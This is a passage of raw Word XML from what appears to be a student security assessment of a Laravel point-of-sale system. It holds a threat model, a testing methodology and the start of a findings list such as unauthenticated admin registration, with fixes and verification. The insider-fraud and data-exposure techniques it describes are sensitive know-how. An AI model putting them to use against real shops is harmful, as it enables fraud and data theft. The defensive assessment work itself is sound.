      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Selected live vulnerability evidence</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Four representative live application screens are included as concise evidence, one for each presenter. The complete before/after results remain in the automated evidence files.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5257800" cy="321948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257800" cy="321948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before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4. Ravindu - V-02 original employee profit report showing revenue, cost, profit and margin data.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5257800" cy="3219893"/>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257800" cy="321989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before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5. Malith - V-10 original invoice screen showing the client-controlled price and discount-request surface.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5257800" cy="3219480"/>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257800" cy="321948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before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6. Hamna - V-09 secure login screen used during the security-response and configuration demonstration.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5257800" cy="3219480"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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257800" cy="321948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before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7. Nimthra - V-20 secure employee stock view without wholesale-cost or margin fields.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">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2.1 Threat model</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">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worked from three attackers, which is what makes the severity ratings meaningful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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A1 - The anonymous internet.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Can reach the API. Before our work: could create an administrator account (V-01), script the API from any website (V-08), and download /.env , /composer.lock and /storage/logs/laravel.log directly (V-07).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">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A2 - A dishonest cashier.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Holds a valid employee token. This is the realistic insider: a shop employee with a till. Before our work: could sell at any price they chose (V-10), erase a customer's debt with no ledger entry (V-04), read every other branch's customers and invoices (V-03), void sales to conceal cash theft (V-02), read company-wide profit and margin (V02), and inspect supplier cost and margin in ordinary GRN/stock API responses (V-20). Critically, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">none of it was logged </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(V-11).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">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A3 - A network or supply-chain attacker.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Before our work: bearer tokens crossed one hop in cleartext (V-15), a poisoned spreadsheet reached a parser with two known CVEs (V-17 + V-12), and the production hostnames were published in a committed .env (V-14).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">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asset that matters most is not the customer list it is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the integrity of the money record</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. A POS system that cannot prove what was sold, at what price, by whom, is worthless as a book of account. Several findings below attack exactly that.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
        <w:ind w:left="24" w:hanging="1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3. Methodology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combined four techniques deliberately, because each find what the others miss.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">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Manual code review (white box).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The primary technique and the one that found the most severe issues. V-01 and V-02 are invisible to a scanner that does not know which routes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ought</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be privileged a scanner sees POST /register returning 201 and calls it working. Reading routes/api.php next to Kernel.php and noticing that a registered middleware alias appears nowhere is a human activity.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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Software composition analysis.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> composer audit and npm audit. Immediate and decisive: 41 and 23 advisories respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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Dynamic testing (black box).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We wrote evidence/poc/run-all.mjs , a suite of scripts that perform each attack against a running instance and report VULNERABLE or FIXED. This is the core of our evidence, because it removes the ambiguity in "we think we fixed it". It is a single command with a pass/fail exit code, so it also serves as the demonstration in the video.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">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Regression testing.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 90 PHPUnit tests (230 assertions) plus 19 Vitest tests, each written to fail against v0-originalvulnerable and pass afterwards.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">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 A note on verifying rather than assuming</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">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Three times during this work the evidence contradicted the initial reading, and each correction improved the result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">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We initially recorded V-10 as "client-supplied totals and spoofable inv_by ".</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reading InvoiceController::store properly showed the server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">did</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> compute the totals itself ( :58-75 ) and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">did</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> force inv_by from the token ( :106 ). The real defect was narrower and, once understood, more interesting: the server computed correct totals </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">from line prices the attacker supplied</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. That is the more instructive finding, because the code looks defensive  and it is what makes the entire discount-approval workflow decorative.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">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An early PoC run reported V-04 and V-10 as already fixed.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Both had returned HTTP 500. A 500 is not a security control; it was a malformed test payload. Had we accepted it, we would have reported two vulnerabilities as absent that were in fact exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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 later run reported V-10 as fixed for the wrong reason.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The V-02 probe ("can an employee reprice stock?") set the catalogue price to 1 as a side effect, so V-10's "sell a 32,000 LKR tyre for 1 LKR" check was comparing 1 against 1 and passing. We made the V-02 probe restore the price and V-10 read the live catalogue price instead of a hard-coded constant.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43" w:hanging="1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general lesson, and one of the best-practice points in §8: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a test that passes tells you nothing unless you have seen it fail for the right reason.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43" w:hanging="1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5">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43" w:hanging="1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6">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43" w:hanging="1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7">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43" w:hanging="1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8">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="43"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9">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="43"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A">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="43"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B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="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4. Vulnerabilities found and fixed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Ordered by severity. Each entry gives evidence, exploit, root cause, fix and verification.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">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V-01 · Unauthenticated registration issued administrator tokens</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">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A01:2021 Broken Access Control, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-862</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CWE-269</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CVSS 9.8</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) ·</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">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Evidence.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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">routes/api.php:28</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">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Public Routes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">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Route::post('/login',    [AuthController::class, 'login']);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">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Route::post('/register', [AuthController::class, 'register']);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"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Registered outside every middleware group. The controller then accepted the caller's own choice of privilege</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> AuthController.php:163</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
